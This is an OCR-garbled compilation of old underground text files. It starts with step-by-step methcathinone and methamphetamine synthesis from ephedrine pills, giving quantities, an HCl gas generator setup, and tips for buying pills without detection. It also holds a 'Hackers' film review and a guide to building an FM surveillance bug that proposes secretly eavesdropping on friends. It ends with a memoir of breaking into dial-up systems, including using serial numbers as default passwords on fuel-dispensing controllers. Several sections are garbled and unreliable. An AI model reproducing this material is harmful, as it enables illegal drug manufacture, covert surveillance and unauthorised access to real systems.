using permanganate, but that method gives an impure product in low yields. 
Any of the common hexavalent chrome salts can be used as the oxidizer in 
this reaction. This list include chrome trioxide (Cr0O3), sodium or 
potassium chromate (Na2CrO4), and sodium or potassium dichromate 
(Na2Cr207). All of these chemicals are very common. Chrome trioxide is 
used in great quantities in chrome plating. The chromates are used in 
tanning and leather making. 


To make methcathinone, the chemist starts with the water extract of 
ephedrine pills. The concentration of the reactants in this case is not 
critically important, so it is most convenient to use the water extract of 
the pills directly after filtering without any boiling away of the water. 
See the section at the beginning of Chapter 15 [I included this at the end 
of the file] on extracting ephedrine form pills. Both ephedrine 
hydrochloride and sulfate can be used in this reaction. 


The water extract of 1000 ephedrine pills is placed into any 
convenient glass container. A large measuring cup is probably best since 
it has a pouring lip. Next, 75 grams of any of the above mentioned +6 
chrome compounds are added. They dissolve quite easily to form a reddish 
or orange colored solution. Finally, concentrated sulfuric acid is added. 
If CrO3 is being used, 21 mL is enough for the job. If one of the 
chromates is being used, 42 mL is called for. These ingredients are 
thoroughly mixed together, and allowed to sit for several hours with 
occasional stirring. 


After several hours have passed, lye solution is added to the batch 
until it is strongly basic. Very strong stirring accompanies this process 
to ensure that the cat is converted to the fr base. Next, the batch is 
poured into a sep funnel, and a couple hundred mLs of toluene is added. 
Vigorous shaking, as usual, extracts the cat into the toluene layer. It 
should be clear to pale yellow in color. The water layer should be orange 
mixed with green. The green may settle out as a heavy sludge. The water 
layer is thrown away, and the toluene layer containing the cat is washed 
once with water, then poured into a beaker. Dry HCl gas is passed through 
the toluene as described in Chapter 5 [I included this at the end of the file] 
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to get white crystals of cat. The yield is between 15 and 20 
grams. This reaction is scaled up quite easily. 


CHAPTER 15 (part of it anyway) 


PROC 


ie 
1s) 
a 
vs) 


BE 
ay 


OBTA N NG PURE EF PHEDRIN 
Ss TIM L N T PILtuUs 


FOR ue dls 

FROM U A 
In the present chemical supply environment, the best routes for making 

meth start with ephedrine as the raw material. To use these routes, a 
serious hurdle must first be overcome. This hurdle is the fact that the 
most easily obtained source of ephedrine, the so-called stimulant or 
bronchodilator pills available cheaply by mail order, are a far cry from 
the pure starting material a quality minded chemist craves. Luckily, 
there is a simple and very low profile method for separating the fillers 


in these pills from the desired active ingredient they contain. 


A superficial paging through many popular magazines[New Body is where 
I found it at GNC] reveals them to be brim full of ads 
from mail order outfits offering for sale "Stimulant" or "bronchodilator" 
pills. These are the raw materials today’s clandestine operator requires 
to manufacture meth without detection. The crank maker can hide amongst 
the huge herd of people who order these pills for the irritating and 
nauseating high that can be had by eating them as is. I have heard of a 
few cases where search warrants were obtained against people who ordered 
very large numbers of these pills, but I would think that orders of up to 
a few thousand pills would pass unnoticed. If larger numbers are 
required, maybe one’s friends could join in the effort. 


The first thing one notices when scanning these ads is the large 
variety of pills offered for sale. When one’s purpose is to convert them 
into methamphetamine, it is very easy to eliminate most of the pills 
offered for sale. Colored pills are automatically rejected because on 
does not want the coloring to be carried into the product. Similarly, 
capsules are rejected because individually cutting open capsules is just 
too much work. Bulky pills are to be avoided because they contain too much 
filler. The correct choice is white cross thins, preferably containing 
ephedrine HCl instead of sulfate, because the HCl salt can be used in more 
of the reduction routes than can the sulfate. 


Once the desired supply of pills is in hand, the first thing which 
should be done is to weigh them. This will give the manufacturer an idea 
of how much of the pills is filler, and how much is active ingredient. 
Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle 
contains 25 grams of active ingredient. A good brand of white cross thins 
will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl 
may not sound like much, but if it is all recovered from these pills, it 
is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three 
or four thousand dollars, not a bad return on the twenty odd dollars a 
thousand lot of such pills costs. [I don’t know where he got 3 or 4 
thousand dollars from, but the pills go for about $35.00/1000 now. 2 
months ago they were $25.00 but now they have to do more paper work 
because it is a DEA controlled substance 


To extract the ephedrine from the pills, the first thing which must be 
done is to grind them into a fine powder. This pulverization must be 
thorough in order to ensure complete extraction of the ephedrine form the 
filler matrix in which it is bound. A blender does a fine job of this 
procedure, as will certain brands of home coffee grinders. 


Next, the powder from 1000 pills is put into a glass beaker, or other 
Similar container having a pouring lip, and about 300 mL of distilled 
water is added. Gentle heat is then applied to the beaker, as for example 
on a stove burner, and with steady stirring the contents of the beaker are 
slowly brought up to a gentle boil. It is necessary to stir constantly 
because of the fillers will settle to the bottom of the beaker and cause 
burning if not steadily stirred. 


ial 
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Once the contents of the beaker have been brought to a boil, it is 
removed from the heat and allowed to settle. Then the water is poured out 
of the beaker through a piece of filter paper. The filtered water should 
be absolutely clear. Next, another 50 mL of water is added to the pill 
filler sludge, and it too is heated with stirring. Finally, the pill 
sludge is poured into the filter, and the water it contains is allowed to 
filter through. It too should be absolutely clear, and should be mixed in 
with the first extract. A little water may be poured over the top of the 
filler sludge to get the last of the ephedrine out of it. This sludge 
should be nearly tasteless, and gritty in texture. The water extract 
should taste very bitter, as it contains the ephedrine. 


The filtered water is now returned to the stove burner, and half of 
the water it contains is gently boiled away. Once this much water has 
been boiled off, precautions should be taken to avoid burning the 
phedrine. The best alternative is to evaporate the water off under a 
vacuum. If this is not practical with the equipment on hand, the water 
may be poured into a glass baking dish. This dish is then put into the 
oven with the door cracked open, and the lowest heat applied. In no time 
at all, dry crystals of ephedrine HCl can be scraped out of the baking 
dish with a razor blade. The serious kitchen experimenter may wish to 
further dry them in a microwave. 


Chapter 5 (The part about the HCl gas) 


A source of anhydrous hydrogen chloride gas is now needed. The 
chemist will generate his own. The glassware is set up as in Figure 1. 
He will have to bend another piece of glass tubing to the shape shown. It 
should start out about 18 inches long. One end of it should be pushed 
through a one hole stopper. A 125 mL sep funnel is the best size. The 
stoppers and joints must be tight, since pressure must develop inside this 
flask to force the hydrogen chloride gas out through the tubing as it is 
generated. 


Into the 1000 mL, three-necked flask is placed 200 grams of table 
salt. Then 25% concentrated hydrochloric acid is added to this flask until 
it reaches the level shown in the figure. The hydrochloric acid must be 
of laboratory grade [I use regular muriatic acid for pools]. 


Figure 1: 
\ / 
\ /Re 
0% Oe <--125 mL separatory funnel 
Oe O% 
Ae AX’ glass tubing Az 
Oe 0% \037 
ft » 
stopcock—>U2A ° Salt and Hydrochloric acid 
stopper —>As \/De Ae <-1 hole mixed into a paste by add- 
Ae Ae stopper ing HCL to salt and mixing. 
A%  A¥ A% Ae The surface should be rough 
O¥ Oe and a good number of holes 
should be poked into the 
1000 mL, 3 neck flask paste for long lasting 
generation of HCl gas. 
Oe acid/salt level o% 
Ae AX% 
Re AX% 
Re AX% 
AX% 


Some concentrated sulfuric acid (96-98%) is put into the sep funnel 
and the spigot turned so that 1 mL of concentrated sulfuric acid flows 
into the flask. It dehydrates the hydrochloric acid and produces hydrogen 


3.txt Wed Apr 26 09:43:41 2017 14 


chloride gas. This gas is then forced by pressure through the glass 


tubing. 


One of the Erlenmeyer flasks containing methamphetamine in solvent is 
placed so that the glass tubing extends into the methamphetamine, almost 
reaching the bottom of the flask. Dripping in more sulfuric acid as 
needed keeps the flow of gas going to the methamphetamine. If the flow if 
gas is not maintained, the methamphetamine may solidify inside the glass 


tubing, plugging it up. 


Within a minute of bubbling, white crystals begin to appear in the 
solution, More and more of them appear as the process continues. It is an 
awe-inspiring sight. In a few minutes, the solution becomes as thick as 


watery oatmeal. 


It is now time to filter out the crystals, which is a two man job. 
The flask with the crystals in it is removed from the HCl source and 


necked flask is swirled a little to 


temporarily set aside. Th 


thr 


spread around the sulfuric acid and then the other Erlenmeyer flask is 
subjected to a bubbling with HCl. While this flask is being bubbled, the 


crystals already in the other flask are filtered out. 


The filtering 


lask and Buchner funnel are set up as shown in figure 


2. The drain stem of the buchner funnel extends all the way through the 
CG 


rubber stopper, b 


ause methamphetamine has a nasty tendency to dissolve 


rubber stoppers. This would color the product black. A piece of filter 
paper covers the flat bottom of the Buchner funnel. The vacuum is turned 
on and the hose attached to the vacuum nipple. Then the crystals are 


poured into the Buchner funnel. 


methamphetamine pass through th 


Buchner funnel as a solid 


cake. 


shaken to suspend the crystals 


poured into the Buchner funnel. 


The solvent and uncrystallized 


filter paper and the crystals stay in the 
About 15 mL of solvent is poured into the 


Erlenmeyer flask. the top of the flask is covered with the palm and it is 


left clinging to the sides. his is also 


Finally, another 15 mL of solvent is 


filter cak 


poured over the top of th 


Figure 2: 


Filtering 


Ag 
<-Bchner Funnel 
\ / 
\ / 
ot / 
Ag 
<--To vacuum 
Ag 
Ag 


flask--> 


Now the vacuum hose is disconnected and the Buchner funnel, stopper 
and all, is pulled from the filtering flask. All of the filtered solvent 
is poured back into the erlenmeyer flask it came from. It is returned to 
the HCl source for more bubbling. The Buchner funnel is put back into the 


top of the filtering flask. 


methamphetamine crystals. 
vacuum is turned back on, 


section of latex rubber gj] 


It still contains the filter cake of 


It will now be dried out a little bit. The 
the vacuum hose is attached to the filtering 
flask, and the top of the Buchner funnel is covered with the palm or 


lOve. 


solvent from the filter cak 


The vacuum builds and removes most of the 
This takes about 60 seconds. The filter 


cake can now be dumped out onto a glass or China plate (not plastic) by 


tipping the Buchner funnel 


1 upside-down and tapping it gently on the plate. 
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And so, the filtering proc 
while the other one is being b 
Erlenmeyer flask to keep their 
flask has been bubbled for abo 
out and the underground chemis 


If ether was used as the s 
be nearly dry now. With a kni 


into powder. If benzene was u 
may be used to speed up this d 


ess continues, one flask being filtered 
ubbled with HCl. Solvent i 


s added to the 


volumes at 300 mL. Eventually, after each 
ut seven times, no more crystal will come 


t is finished. 


olvent, the filter cakes on the plates will 


fe from the silverwar 


drawer, the cakes ar 
cut into eighths. They are allowed to dry out some more then chopped up 
sed, this process takes longer. Heat lamps 
rying, but no stronger heat source. 


[The above section of chapter 5 is talking about methamphetamine. You 
could, in most instances, substitute the word methcathinone, but I wanted 


to present the text to you in 


its exact form. ] 


Review of "HACKERS" 


By Wile Coyote 


Sorry, it might be a little lo 
of it is just a rant anyway... 


First off, I have to admit t 


Hope you enjoy it. 


ng... cut it to ribbons if you want, most 


hat I was biased going into the movie 


"Hackers"... I heard that it wasn’t going to be up to snuff, but did I 


let that stop me? No, of cour 
stride towards my girlfriend a 


wanting to s the movie hers 
oh, well, what can you do with 
computer illegitimate?). Now o 


THE MOVIE 


se not... I sucked up enough courage to 
nd beg for seven bucks... 
lf (and sadly, she rather 


:) She ended up 


NEO. 8.s 


njoyed it... 


the computer illiterate or is it the 


(Yes, I AM going to give you a second-by-second playback of the 
spoil the plot, you say? 
il! :) just kidding, go see it... maybe 


movie... you don’t want me to 
worry, there is no plot to spo 
you'll like it...) 


Well, from the very first fe 
with an FBI raid on some unsus 


main character, but that’s lat 
WaReZ DOOD!!! !!!taitirraqitiy! 
cinematography counts!) But, t 


this home and run up the stair 


Well, don’t 


w seconds, I was unimpressed... It begins 


pecting loose (who turns out to be the 
n you say 
was bad... (Hey, 
he Feds bust into 
(the mom) just kind 


er) named Zero Cool (c 
"). The cinematograph 
he acting was worse. 
s, all while this lady 


of looks on dumbfounded and ke 
or something (is this what ar 


Ok, so the story goes on like 
virus that he uploads to, I th 
1,507 computers. There is ar 


eps saying stuff like 


a 


y 
ak 


W 


hey, 


"ELIEEEEERT 


stop: that.g ea"; 


aid is like? I’ve never had the pleasure... 


this: The 11 year old 
ink, the NY stock exch 


a 


nge, 


kid made a computer 


and it crashes 


eally lame court scen 


wher 


the kid is 


sentenced to 7 years probation where he can’t use a computer or a 


touch-tone phone... That was 


Time passes... Now it’s 1995, 


like what’s on Ricki Lake!). 


(I don’t think I have ever seen such a trippy view of the 


1988... 


and boy have things changed (except th 


mom... hmmm....). Now the ex-hacker is allowed to use a computer (his 
18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) 
boxing some TV station to change the program on television (yes, I know 
that all of you super-el33t hackers hack into TV stations when you don’t 


N-e-way, while hacking into their 

super-funky system (the screen just kind of has numbers moving up and 
down the screen like some kind of hex-editor on acid...) 
he gets into a "hacking battle" with some other hacker called Acid Burn 


MINES TN Sts s.3 
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lots of Very high-end graphics, not very realistic, but it’s Hollywood...). 
In the end, the other hacker kicks the shit out of him (he has changed 

his handle to Crash Override now, just to be cool, i guess) and logs him 
off the TV station. Wow, tense... cough... 


For those of you who care, let me describe the "hacker" Crash Override: 

He is definitely super-funky-—coole-mo-d-el31t-to-the-max, ‘cause he is 
(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) 
clothes, and the CDC might have quite a bit to say about the amount of 
leather he wears... I mean, there are limits to that kind of stuff, man! 
And to top off his coolness, he is, like, the roller-blade king of the 
world. (Not that hackers don’t roller-blade, but he does it just Soooo 
much cooler than I could... :) ). And yet, here’s the nifty part, 

despite all of his deft coolness, he couldn’t get a girl for the life 

of him (we all morn for him in silent prayer). 


Ok, so now Crash is at school, and he meets Wonderchick (who is 
EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she 
is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to 
spoil the suspense). 


Now, while at school, he wants to hook up with wonderchick, so he breaks 
into the school’s computer (it must be a fucking Cray to support all of 
the high-end-type graphics that this dude is pulling up) and gets his 


English(?) class changed to hers. So, some other super-d00dcool hacker 
spots him playing around with the schools computer (it’s funny how may 
lite hackers one can meet in a new york public school...), so he 


catches up with Crash and invites you to an elite (Oh, if you ever want 

to see a movie where the word 31333333333t is used, like a fucking 
million times, then go see Hackers...) hackerz-only club, complete with 
million-dollar virtual-reality crap and even a token phreaker trying to 
red-box a pay-phone with a cassette recorder (never mind that the music is 
about 197 decibels, the phone can still pick up the box tones...). 


What follows is that Crash meets up with some seriously k-rad hackers 
(Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and 
Phantom Phreak : who reminds of that gay kid on "my so called life... 
maybe that was him?";Lord Nikon : the token black hacker... Photographic 
memory is his super-power). They talk about k001 pseudo-hacker shit and 
then a 100ser warez-type guy comes up and tries to be E133t like everybody 
else. He is just about the ONLY realistic character in the whole movi 

He acts JUST like a wannabe "Hiya DOOdz, kan eye b kOewl too?". He keeps 
saying "I need a handle, then I’11 be el33t!". (Why he can’t just pick 

his own handle, like The Avenging Turd or something, is beyond me... He 
plays lamer better than the kids in Might Morphin Power Rangers... awesome 
actor!). N-e-way, this is where the major discrepancies start. Ok, 

first they try to "test" Lamerboy by asking him what the four most used 
passwords are. According to the movie, they are "love, sex, god, and 
secret". (Hmmmm.... I thought Unix required a 6-8 char. password....). 
Somehow lamerboy got into a bank and screwed with an ATM machine four 
states away; all of the hacker chastise him for being stupid and hacking 

at home (If you watch the movie, you’ll notice that the hackers use just 
about every pay-phone in the city to do their hacking, no, THAT doesn’t 
look suspicious)Next they talk about "hacking a Gibson". 

(I was informed that they WANTED to use "hacking a Cray", 

but the Cray people decided that they didn’t want THAT kind of publicity. 
I’ve never heard of a Gibson in real life, though...). 

They talk about how k-powerful the security is on a Gibson, and they say 
that if Lamerboy can crack one, then he gets to be elite. 


Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash 
loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy 
finally cracks a Gibson with the password God (never mind a Login name or 
anything that cool). Then the cheese begins in full force. The Gibson 
is like a total virtual-reality thingy. Complete with all sorts of cool 
looking towers and neon lightning bolts and stuff. Lamerboy hacks into a 
garbage file (did I mention that the entire world is populated by Macs? 
Ob. a. epanE o2 well, hold on :)...). So, this sets alarms off all 
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over the place (cause a top-secret file is hidden in the garbage, see?), 
and the main bad-guy, security chief Weasel, heads out to catch him. He 
plays around with some neon, star-trek-console, buttons for a while, 

then calls the "feds" to put a trace on the kid. La de da, ess catches him 
in a second, and the kid only gets half of the file, which he hides. 

(to spoil the suspense, yet again, the file is some kind of money getting 
program, like the kind some LOD members wrote about a long time ago in 
Phrack, which pulls money from each transaction and puts it into 

a different account. Needless to say, the Security Weasel is the guy who 
wrote it, which is why he needs it back, pronto!). 


As we travel along the movie, the hackers keep getting busted for tapping 
into the Gibson, and they keep getting away. The "action" heats up when 
Wonderchick and Crash get into a tiff and they decide to have a hacking 


contest... They go all over the city trying their best to fuck with 
the one fed they don’t like.... Brilliant move, eh? The movie kind of 
reaches a lull when, at a party at Wonderchick’s house, they s a k-rad laptop. 


They all fondle over the machine with the same intensity that Captain Kirk 
gave to fighting Klingons, and frankly, their acting abilities seems 

to ask "please deposit thirty-five cents for the next three minutes". 

It was funny listening to the actors, /’cause they didn’t know shit about 


what they were saying... Here’s a clip: 

Hey, cool, it’s got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not 
Kbps, mind you :)...I wonder where they designed a .8 of a bit?) 

Yeah! Cool... Hey what kind of chip does it have in it? 

A P6! Three times faster than a Pentium.... Yep, RISC is the wave of 
the future... (I laughed so hard..... Ok, first of all, it is a Mac. 
Trust me, it has the little apple on the cover. Second it has a P6, what 


server she ripped this out of, I dare not ask. How she got that 

bastard into a laptop without causing the casing to begin melting is 

yet another problem... those get very hot, i just read about them 

in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6, 
because it has RISC coding.... 


I kinda wished I had stayed for the credits to see the line: 
Technical advisor None.... died on route to work...) 


Finally they ask something about the screen, and they find out it is 
AD eed docs hold your breath.... ACTIVE MATRIX! ... Kick ass! 


They do lots of nifty things with their magic laptops (I noticed that they 
ALL had laptops, and they were ALL Macintoshes. Now, I’m not one to say 
you can’t hack on a mac, ‘cause really you can hack on a TI-81 if you’ve 


got the know.... but please, not EVERYONE in the fucking movie 
has to have the exact same computer (different colors, though... there 
was a really cool clear one).... it got really sad at the end), and they 


finally find out what the garbage file that Lamerboy stole was, this time 
using a hex editor/CAD program of some sort. 


As we reach the end of the movie, the hackers enlist the help of two very 
strangely painted phone phreaks who give the advice to the hackers to send 
a message to all of the hackers on the ’net, and together, they all 

kicked some serious ass with the super-nifty-virtual-reality Gibson. 


In the end, all of the Hackers get caught except for one, who pirates all 
of the TV station in the world and gives the police the "real" story... 
So, the police politely let them go, no need for actually proving that the 
evidence was real or anything, of course. 


So, in the end, I had to say that the movie was very lacking. It seemed 
to be more of a Hollywood-type flashy movie, than an actual documentary 
about hackers. Yes, I know an ACTUAL movie about hacker would suck, but 
PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It 
may have sucked less if they didn’t put flashing, 64 million color, 
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fully-rendered, magically delicious pictures floating all over the screen 
instead of just a simple "# " prompt at the bottom. With all of the 
super-easy access to all of the worlds computers, as depicted in the movie, 
ANYBODY can be a hacker, regardless of knowledge, commitment, or just 
plain common sense. And that’s what really made it suck... 


Hope you enjoyed my review of HACKERS! 
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PART II 


CONSTRUCTING AN FM BUG 


written by 
+ Obi-1 
* edjjs@cc.newcastle.edu.au 


* * 
S$ Written for Phrack 
x$x if any other magazine 
S wishes to print this 
xSx article they must let the 
author know in advance 
INTRODUCTION 


Before anything this article sole purpose is to teach everyon 
out there about electronics. If you do build it use it at your own risk. 
You will need a decent knowledge of electronics and how to solder some 
components. So if you dont know how to build electronic kits and want a 
bug you can buy one ready-made from me, just write to the e-mail address 
above. Ok enough crap.. so you ask what is an FM bug, well an FM bug is 
like a tiny microphone that can transmit crystal clear audio to a near 
by Walkman/stereo etc. The range of the bug we are making is about 800 
meters, and the battery life is about 100hrs on a normal alkaline 
battery. This bug however is not to be moved while in use, so you cant 
put it in your pocket and walk around. There are other bugs on the 
market but this I found to be the most reliable and relatively easy to 
build. The actual size of the PCB is only 2cm X 2cm! However the battery 
is actually the biggest component. Some parts like the Surface Mount 
resistors, air trimmer and electret microphone maybe hard to find. I 
find mail-order catalogs are the best source of parts as they have a 
bigger range than a store like Dick Smith. I did not actually design 
this circuit, Talking Electronics did, but felt everyone out there might 
like to know how to build one of these. The surface mount resistors can 
be replaced with normal resistors but I recommend using the surface 
mount resistors as they give more of an educational experience to this 
project <puke> <puke> If you dont have a clue how to build a bug and 
have no knowledge of electronics whatsoever e-mail me and you can 
purchase one pre-built from me. 


COMPONENT LIST 


Resistors 
1- 470 R surface mount 
1- 10k surface mount 
1- 47k surface mount 


4.txt Wed Apr 26 09:43:41 2017 2 


1- 68k surface mount 
1- 1M surface mount 


Capacitors 

1- 10p disc ceramic 

1- 39p disc ceramic 

1- in disc ceramic 

2- 22n disc ceramics 

1- 100n monoblock (monolithic) 
1- Air trimmer 2p-10p 


Other 
2- BC 547 transistors 
1- 5 turn coil 0.5mm enameled wir 
1- electret mic insert- high sensitivity 
1- 9V battery snap 
1- 15cm tinned copper wire 
1- 30cm fine solder 
1- 170cm antenna wire 


NOTE: use 170cm of electrical wire for the antenna, this length will give 
you maximum range, however since the antenna wire needs to be extended 
when bugging the concealability might be a factor. You can shorten the 
wire’s length but this will shorten the range yet make it easier to 
conceal. Weigh the factors and do whats right for you. 


ASSEMBLY OF CIRCUIT 


First familiarize yourself with the layout of the components. 
Now the only polarized (parts that have to put around the right way) are 
the two transistors, the battery and the microphone. All other parts can 
be soldered either way around. I recommend using this order for assembly 
as it is the most practical and easiest way to build the bug. 


5 surface mount resistors. 
6 capacitors. 

2 transistors. 

air trimmer 

S-turn coil. 

battery snap. 

microphone. 

antenna wire. 


WDAIHDUNPWNE 


READING RESISTOR AND CAPACITOR VALUES 


If you dont know how to read the value of a surface mount 
resistor or disc ceramic capacitor read on. 


Surface mount resistor: These have thr numbers, with the first two 
digits being multiplied by the third. The third digit represents how 
many zeros after the first two. For example a surface mount resistor 
with code 1-0-5 would mean that the first two digits (1-0) would be 
multiplied by 5 zeros. To give the value 10 000000hms or 1Mohm. 


Capacitor: These are similar to the above but the base number is pF or 
pico farads. eg a capacitor labeled 2-2-3 has the value of 22 OOOpF. 


HOW IT WORKS 


The FM bug circuit consists of two stages: an audio amplifier 
and a RF oscillator stage. 


1.THE AUDIO AMPLIFIER STAG 


E 


The microphone detects audio in the form of air vibrations that 
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nter the hole at the end of the microphone and move the diaphragm. The 
diaphragm is a thin piece of metalised plastic and is charged during 
manufacture. Some of these vibrations pass down a lead which touches it 
to and into a FET transistor. A FET transistor has a very high input 
impedance and does not have a loading effect on the charges. The audio 
then gets passed through a BC 547 transistor which amplifies the sound 
around seventy times. The BC547 then passes it to the base of the 
oscillator stage. 


2eLHI 


Gl 


OSCILLATOR STAG 


GJ 


The 47k resistor picks up the pulse from the transistor and then 
turns the second or oscillator transistor ON, but the 47k resistor has a 
value so that it will not turn the transistor on fully. So the feedback 
pulse from the 10p capacitor turns it ON fully. 


Normally a transistor is turned ON/OFF via the base, however it 
can be also done by holding the base firm and differing the emitter 
voltage. In the FM bug this is whats done, the lp capacitor holds the 
base firm and the 10p feedback capacitor differs th mitter voltage. 
However for a capacitor to do this the emitter must have a DC voltage 
that can be increased and decreased. The DC voltage is about 2V and the 
base will be 0.6V higher than this so the base voltage is fixed at 2.6V 
by the lp capacitor. The voltage does not rise or fall when the 
oscillator is operating only when the audio is injected into the base 
via the 100n capacitor. This is how the circuit works and continues like 
this at a rate of about 100 million times per second. 


The oscillator is designed to operate at around 100mhz, however 
this figure is dependent on a lot of factors such as the 6 turn coil, 
the 10p capacitor and 470R and 47k resistors also and the figure of 
operation is about 90mhz (my FM bug operated at 88.5mhz). 


GETTING THE BUG READY FOR ACTION 


Ok so you have built the bug now and are ready to use it. Well 
first of all you will need some sort of FM radio. Alright put the bug 
next to or near the radio’s antenna. Turn the bug and the radio on. 
Alright starting from the bottom end of the radio’s FM scale. Slowly 
progress your way through the FM band. Usually your bug will tend to be 
around the 85-95mhz range. Once you hear a beep (because your bug is 
close to the radio) or any other strange static noise stop. Alright you 
might have been lucky and your bug is exactly tuned already, however in 
most cases you will need to adjust your bug slightly. Using a small 
screwdriver slowly turn the air trimmer, whilst doing this babble out 
some words, stop turning until the echo of your voice through the radio 
becomes crystal clear. Your bug is now tuned and you are ready to put it 
to use. 


You might have some problems with your bugs frequency being 
exactly same as a radio stations. No problem, by compressing or 
uncompressing the coil you can change your bugs frequency. Use the coil 
method if your bug is in the middle of a few radio stations frequencies, 
if you just need to move it up or down one or two mhz then use the air 
trimmer. 


PUTTING THE BUG TO USE 


Many of you already have your ideas on how to use the bug. 
Remember it might be illegal in your Country/State/city to use this bug 
in the way you intend. Hey its up to you I dont mind, however I take no 
responsibility if you get in trouble. 


Anyway here are a few "friendly methods": 


1. CHRISTMAS. Yes it will soon be that time of year again, and 
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this time also brings a great opportunity to discover some of those 
family secrets or maybe even find out what lame presents those relatives 
have brought you and save you from the disappointed face they will see 
when you open it. 


Okay put the bug either in the pot the tree is standing in or 
fasten it to a branch relatively close to the bottom of the tree. We 
place it at the bottom of the tr because the antenna needs to be 
extended if we want really cool range. Okay put the bug in its position 
and then unravel the wire all over the tree. 


2. TV listening. Okay if you are out in the backyard whether it 
because you want to, or there is some chore that needs to be done. You 
can listen to a favorite TV show, or a basketball game or such. I know 
your saying why not listen to the radio, well you now have a choice of 
listening to a radio station or one of the 10000000 TV channels your 
state offers you. 


Set the bug up about 3-5m away from the TV, then adjust the TV 
volume so that it is just right to hear on your radio. 


3. Bug-a-friend. Okay you can bug your friend to see what he/she 
is up to. Okay you will need to know where your friend goes and then 
previously go there and set up the bug and your listening point. Make 
sure that you set up a place where conversation happens, it is very 
boring listening to insects and such. 


Conceal the bug anywhere within a 3-5m radius of where your 
friend talks and stuff. Now conceal yourself and then sit back and 
listen. 


Now there are a few of the more "legally friendly" methods, 
there are thousands more not-so-friendly and even malicious 
methods <Oooooooo> that I will leave up to your imagination. 


CONCLUSION 


I hope the information contained can help you successfully build a bug, 
and then good luck using it. If you have trouble just e-mail me. If you 
can not get hold of some of the components, you can order them through 
me. Also if you want a bug, but dont have the electronic skill to do it, 
you can buy pre-built bugs through me.. just e-mail me. may the force be 
with you 


Obi-1. 


My short time as a hacker. 
by Kwoody 


I live in a small town in northern British Columbia where the city 
owns the phone company. All of BC is serviced by BCTel, except here in 
Prince Rupert. The phone company used, up until 1991, mechanical 
switches, no lie! Tech dating back to the 50’s sometime. I know this 
because I know some of the workers of CityTel. (The name of the phone 
company). Because of this they were not able to offer all the goodies 
like Caller ID, Call Forward etc...and it was easy to hack then, not 
the phone company, but all the other systems in this small town of 
16000+ people. 


I got into hacking sort of accidently. I have had a computer and modem 
of one kind or other since about 1983. I moved here after high school 
in 1986 and found a good paying job I have worked at for the last 8 
years. One night night in 1990 I was sitting around with my roommate 
having a few beers and decided to call a buddy of ours to come over 
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but I dialed the number wrong and got a computer tone. Cool I 
thought... I knew the numbers of the 2 local BBS’s and that wasnt one 
of them. 


I fired up the computer and called it again. I got the prompt: 
Xenix 386 Login:. 


I had some knowledge of other OS’s and knew this was some kind of Unix 
box. A friend of my roomie was going to university (UBC) and he 
happened to phone that night. I chatted with him for a bit and told 
him what I had found. He told me to try sysadm or root. I got in with 
sysadm, no password! 


I found that I had complete control of the system and it belonged to 
the local school board. I bought a book on Unix and learned as much as 
I could about the system and Unix in general. I guess being a rookie 
(read lamer?) and not knowing shit about how to cover my tracks they 
discovered the system had been hacked and shut down the dial-in. They 
went back online a few weeks later and left sysadm wide open no 
password again. I could not believe it! Even after being hacked they 
still left their system open like that. 


By now I was hooked and I wanted to see if there were any other 
systems in town. I could program a little in Pascal and basic (lame) 
and tried to write a dialer of some kind. No go...so instead I figured 
out the script language of Q-modem and wrote a 40 line script that 
worked. It dialed all numbers sequentially but I did not worry too 
much about being caught since the switch they used was so ancient 
because they didnt have caller ID or anything like that yet. 


I did not know at this time of the hacker community and some of the 
programs available that would do this already. And even if I did I 
wouldnt have known where to call and get them. At any rate I had two 
computers an XT and a 386 both with modems and two phone lines, one I 
used as my normal voice line and one for data. I setup the dialer on 
both and away I went. By the time I had finished scanning both the 
prefixes, 624 and 627, I found about 30 computers. Of those I was able 
to get into about 10. All of them used defaults and all except the on 
below were Unix boxes. 


Although I did find one number that connected at 1200 I think it 
belonged to the phone company. After I was connected nothing would 
happen. I tried for a while to get a prompt of some kind then suddenly 
a line of text appeared that listed two phone numbers and some other 
stuff that I cant remember. So I just left it alone for a while to see 
what came up. It soon became clear that the numbers in one column were 
always one of 4 numbers. RCMP, Fire Dept, Battered Womens Shelter and 
a second RCMP detachment. It looked like it recorded all calls coming 
into those 4 places. 


One hack I did was on a system that dispensed fuel. It was called a 
KardGuard 3000C. I knew of two places in town that had these systems. 
One was where I worked and the other was our competitor. And since I 
knew how it worked it was easy to get in. I saw their volume of fuel 
dispensed and such and could have done really nasty things like erase 
their transaction buffer or get free fuel from them. But I didnt since 
I did not see the point in hurting them or their system even if they 
were our competitor. 


For those of you who might find such a system I’1ll give a brief run 
down on it. The hardware is limited to 300 bps 7E1 and consists of a 
few things. 


You can tell the system as it announces it when you connect: 


KardGuard 3000C Motor Fuel Dispensing System. 
PASSWORD: 
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The system uses punch coded cards read by a card-reader. You have a 4 
digit security code that you need to activate the pump to dispense 
fuel. Everything is kept track of by a computer that reads the amount 
of fuel pumped, date, card number and a few other things depending on 
how the card is coded. Like odometer reading or car number. 


Now to get into this system via dial-in all you have to know is the 
Serial Number of the system. All of these type systems use the serial 
number as the default password to access it via dial-up. And its easy 
to get the serial number. If you know the location of the card-reader 
go and look on the side of it. Generally the actual card reader is 
housed in a metal box. On the side of the card reader itself near th 
back is a small sticker and the serial number will be written on the 
sticker. That was how I did it. I just went to their card reader and 
took the serial number off it and got in. 


Once in you can do any number of things. Shut off the pumps or 
manually activate them without a card and get fr fuel, s how much 
of any product was dispensed. Products range from 0-15. 0 being 
regular gas, 1 regular unleaded etc. It is fairly limited of what you 
can do but you can do some nasty stuff to the company who owns it if 
you know how. A note to this all commands must be UPPERCASE. And all 
commands are one letter. Like E is for looking up the 4 digit code for 
individual cards. I dont remember all of them as we upgraded to the 
latest version of the KardGuard which supports up to 14.4k and is a 
faster system. 


After about 3 months of this sort of stuff I was at work one Saturday 
and got a phone call from a Constable Burke of the RCMP Special 
Investigation Unit. 


